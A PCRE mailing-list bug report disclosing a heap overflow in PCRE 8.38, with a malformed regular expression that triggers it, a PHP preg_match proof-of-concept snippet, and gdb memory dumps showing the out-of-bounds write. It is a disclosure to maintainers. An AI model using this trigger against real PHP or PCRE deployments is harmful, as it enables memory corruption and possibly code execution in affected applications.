[pcre-dev] [Bug 1767] New: PCRE Library Heap Overflow Vulner…

Top Page
Delete this message
Author: admin
Date:  
To: pcre-dev
New-Topics: [pcre-dev] [Bug 1767] PCRE Library Heap Overflow Vulnerability, [pcre-dev] [Bug 1767] PCRE Library Heap Overflow Vulnerability
Subject: [pcre-dev] [Bug 1767] New: PCRE Library Heap Overflow Vulnerability
https://bugs.exim.org/show_bug.cgi?id=1767

            Bug ID: 1767
           Summary: PCRE Library Heap Overflow Vulnerability
           Product: PCRE
           Version: 8.38
          Hardware: All
                OS: All
            Status: NEW
          Severity: security
          Priority: medium
         Component: Code
          Assignee: ph10@???
          Reporter: rubymail@???
                CC: pcre-dev@???


Created attachment 856
--> https://bugs.exim.org/attachment.cgi?id=856&action=edit
regular expression to trigger the crash of pretest

I. Summary
PCRE is a regular expression C library inspired by the regular expression
capabilities in the Perl programming language. The PCRE library is incorporated
into a number of prominent programs, such as Adobe Flash, Apache, Nginx, PHP,
KDE/Konqueror.
PCRE library is prone to a vulnerability which leads to Heap Overflow. During
the compilation of a malformed regular expression, more data is written on the
malloced block than the expected size output by compile_regex. Exploits with
advanced Heap Fengshui techniques may allow an attacker to execute arbitrary
code in the context of the user running the affected application.
------------------------------------------------------------------
II. Description
Latest version of PCRE is prone to a Heap Overflow vulnerability which could
caused by the following regular expression.

/((?:F?+(?:^(?(R)a+\"){99}-))(?J)(?'R'(?'R'<((?'RR'(?'R'\){97)?J)?J)(?'R'(?'R'\){99|(:(?|(?'R')(\k'R')|((?'R')))H'R'R)(H'R))))))/

To reproduce the problem, we could use pcretest provide by PCRE library or
applications which is wrapped with PCRE such as PHP.
For PHP, latest version of PHP 7.0.0 (wrapped with PCRE 8.38) could be
triggered by following code snippet:

<?php
$preg_match("/((?:F?+(?:^(?(R)a+\"){99}-))(?J)(?'R'(?'R'<((?'RR'(?'R'\){97)?J)?J)(?'R'(?'R'\){99|(:(?|(?'R')(\k'R')|((?'R')))H'R'R)(H'R))))))/","WenGuanxing");
?>

First, pcre_compile2 invoke compile_regex() to calucate the size of memory that
is used to save the regular expression.
re then points to the new allocated memory with the size above.
Next, pcre_compile2 invoke compile_regex() again to fill the regular expression
into the allocated memory.
The problem here is that more data is written then expected.

Following test is conveyed under Ubuntu 15.10 x64 with php 7.0.0:
==============================================================
gdb php 
(gdb) r poc.php
9332    re = (REAL_PCRE *)(PUBL(malloc))(size);
(gdb) x/2i $rip-3
   0x5aa95a <php_pcre_compile2+7706>:   mov    rdi,rbx
=> 0x5aa95d <php_pcre_compile2+7709>:   call   QWORD PTR [r12]
(gdb) info registers rdi
rdi            0x710
(gdb) ni
(gdb) x/16b $rax
0x209c870:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x209c878:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
==============================================================


So the expected size of the above regular expression is 0x710 = 1808.
And the base address of allocated memory is 0x209c870.
Here is the layout of 0x209c870 + 0x710 before the second compile_regexp:

==============================================================
(gdb) x/32b (0x209c870+0x710-0x10)
0x209cf70:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x209cf78:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00]
0x209cf80:      0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x209cf88:      0x81    0xe0    0x00    0x00    0x00    0x00    0x00    0x00
==============================================================


After the second compile_regexp:

==============================================================
(gdb) x/32b (0x209c870+0x710-0x10)
0x209cf70:      0x78    0x00    0x7a    0x78    0x00    0xaa    0x78    0x00
0x209cf78:      0xb0    0x78    0x00    0xb8    0x78    0x00    0xbe    0x78]
0x209cf80:     *0x06   *0xa4   *0x78   *0x06   *0xaa    0x00    0x00    0x00
0x209cf88:      0x81    0xe0    0x00    0x00    0x00    0x00    0x00    0x00
==============================================================


5 more bytes are written on the heap in this case.
This overflow can be used to modify adjacent length field of
array/vector/string, gaining the attacker the ability to read/write the whole
memory in the context of the affected application.
------------------------------------------------------------------
III. Impact
Heap Overflow
------------------------------------------------------------------
IV. Affected
PCRE version 8.38 are confirmed to be vulnerable.
Other applications may also be affected.
------------------------------------------------------------------
V. Credit
Wen Guanxing from Venustech ADLAB is credited for this vulnerability.

--
You are receiving this mail because:
You are on the CC list for the bug.